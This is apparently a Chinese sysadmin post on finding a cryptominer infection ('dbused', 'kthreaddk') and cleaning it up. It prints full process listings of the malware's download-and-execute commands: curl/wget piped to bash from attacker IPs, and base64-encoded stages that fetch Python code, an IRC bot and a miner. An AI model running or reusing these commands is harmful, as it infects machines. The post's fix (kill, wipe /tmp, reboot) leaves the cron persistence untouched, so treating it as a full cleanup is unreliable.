问题描述
发现服务器的CPU和内存占用非常高,然后看了一下发现有几个异常的程序
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
12043 root 20 0 2443988 2.3g 4 S 100.3 15.1 9:12.96 dbused
13556 root 20 0 2441068 2.3g 1408 S 99.7 15.1 5:05.31 kthreaddk
然后再次执行
ps -ef
[root@serve1 ~]# ps -ef |grep http://
root 6262 6261 0 Jan06 ? 00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root 6476 11610 0 Jan23 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root 8570 8569 0 Jan06 ? 00:00:00 sh -c export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin; (curl -s http://185.106.94.146/xms || wget -q -O - http://185.106.94.146/xms || lwp-download http://185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms
root 14491 14121 0 09:22 pts/0 00:00:00 grep --color=auto http://
root 15581 11610 0 Jan22 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root 16484 16467 0 Jan02 ? 00:00:00 bash /tmp/.dat http://194.38.23.170/bashirc.x86_64
root 19015 11610 0 Jan26 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root 19230 19017 0 Jan26 ? 00:00:00 curl -k http://dw.bpdeliver.ru/x86_64 -o /tmp/dbused
root 22662 11610 0 Jan26 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root 22735 11610 0 Jan26 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
root 24207 11610 0 2022 ? 00:00:00 /bin/bash -c (curl -s http://194.38.23.170/xms || wget -q -O - http://194.38.23.170/xms || lwp-download http://194.38.23.170/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMzguMjMuMTcwL2QucHkiKS5yZWFkKCkpJw== | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xOTQuMzguMjMuMTcwL2Jhc2hpcmMuJCh1bmFtZSAtbSkgPiAvdG1wL2lyY2Q7IGNobW9kICt4IC90bXAvaXJjZDsgL3RtcC9pcmNkOyBiYXNoIC90bXAvLmRhdCBodHRwOi8vMTk0LjM4LjIzLjE3MC8kKHVuYW1lIC1tKSA+IC90bXAvZGJ1c2VkOyBjaG1vZCAreCAvdG1wL2RidXNlZDsgL3RtcC9kYnVzZWQgLWMgJHVybDsgL3RtcC9kYnVzZWQgLXB3bg== | base64 -d | bash -
root 28928 2920 0 Feb16 ? 00:00:00 /bin/bash -c (curl -s http://185.106.94.146/xms?cron || wget -q -O - http://185.106.94.146/xms?cron || lwp-download http:/185.106.94.146/xms /tmp/xms) | bash -sh; bash /tmp/xms; rm -rf /tmp/xms; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9kLnB5IikucmVhZCgpKScgfHwgcHl0aG9uMiAtYyAnaW1wb3J0IHVybGxpYjtleGVjKHVybGxpYi51cmxvcGVuKCJodHRwOi8vMTg1LjEwNi45NC4xNDYvZC5weSIpLnJlYWQoKSkn | base64 -d | bash -; echo cm0gLXJmIC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQoKSB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBJRlM9LyByZWFkIC1yIF8gXyBob3N0IHF1ZXJ5IDw8PCAiJDEiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBleGVjIDM8Ii9kZXYvdGNwLyR7aG9zdH0vODAiOyB7JyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgcHJpbnRmICIlc1xyXG4lc1xyXG5cclxuIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJHRVQgLyR7cXVlcnl9IEhUVFAvMS4wIiBcJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICAgICAgICAgICAgICJIb3N0OiAkaG9zdCInID4+IC90bXAvLmRhdDsgZWNobyAnICAgIH0gPiYzJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLXIgbGluZTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnSUNBZ0lDQWdJRnRiSUNJa2JHbHVaU0lnUFQwZ0pDZGNjaWNnWFYwZ0ppWWdZbkpsWVdzPScgfCBiYXNlNjQgLWQgPj4gL3RtcC8uZGF0OyBlY2hvICcnID4+L3RtcC8uZGF0OyBlY2hvICcgICAgZG9uZSA8JjMnID4+IC90bXAvLmRhdDsgZWNobyAnICAgIG51bD0iXDAiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICB3aGlsZSBJRlM9IHJlYWQgLWQgIiIgLXIgbGluZSB8fCB7IG51bD0iIjsgW1sgLW4gIiRsaW5lIiBdXTsgfTsgZG8nID4+IC90bXAvLmRhdDsgZWNobyAnICAgICAgICBwcmludGYgIiVzJWIiICIkbGluZSIgIiRudWwiJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJyAgICBkb25lIDwmMycgPj4gL3RtcC8uZGF0OyBlY2hvICcgICAgZXhlYyAzPiYtJyA+PiAvdG1wLy5kYXQ7IGVjaG8gJ30nID4+IC90bXAvLmRhdDsgZWNobyAnZG93bmxvYWQgIiQxIicgPj4gL3RtcC8uZGF0OyBieXRlcz0kKHBpbmcgLWMgMSBwb29sLnN1cHBvcnR4bXIuY29tIDI+L2Rldi9udWxsfGdyZXAgImJ5dGVzIG9mIGRhdGEiIHwgd2MgLWwpOyBpZiBbWyAiJGJ5dGVzIiAtZXEgIjAiIF1dOyB0aGVuIHVybD0iICI7IGVsc2UgdXJsPSItZCI7Zmk7IGJhc2ggL3RtcC8uZGF0IGh0dHA6Ly8xODUuMTA2Ljk0LjE0Ni9iYXNoaXJjLiQodW5hbWUgLW0pID4gL3RtcC9pcmNkOyBjaG1vZCAreCAvdG1wL2lyY2Q7IC90bXAvaXJjZDsgYmFzaCAvdG1wLy5kYXQgaHR0cDovLzE4NS4xMDYuOTQuMTQ2LyQodW5hbWUgLW0pID4gL3RtcC9kYnVzZWQ7IGNobW9kICt4IC90bXAvZGJ1c2VkOyAvdG1wL2RidXNlZCAtYyAkdXJsOyAvdG1wL2RidXNlZCAtYyAkdXJsIC1wd247IHJtIC1yZiAvdG1wL2RidXNlZA== | base64 -d | bash -
发现服务器已经被搞得不成样子了。
解决方案
首先杀死进程
kill -9 12043 12203 12202 12047 12048 12049
plill -f kthreaddk
删除临时文件
rm -rf /tmp/*
rm -rf /var/tmp/*
然后重启计算机
reboot
然后发现系统恢复正常了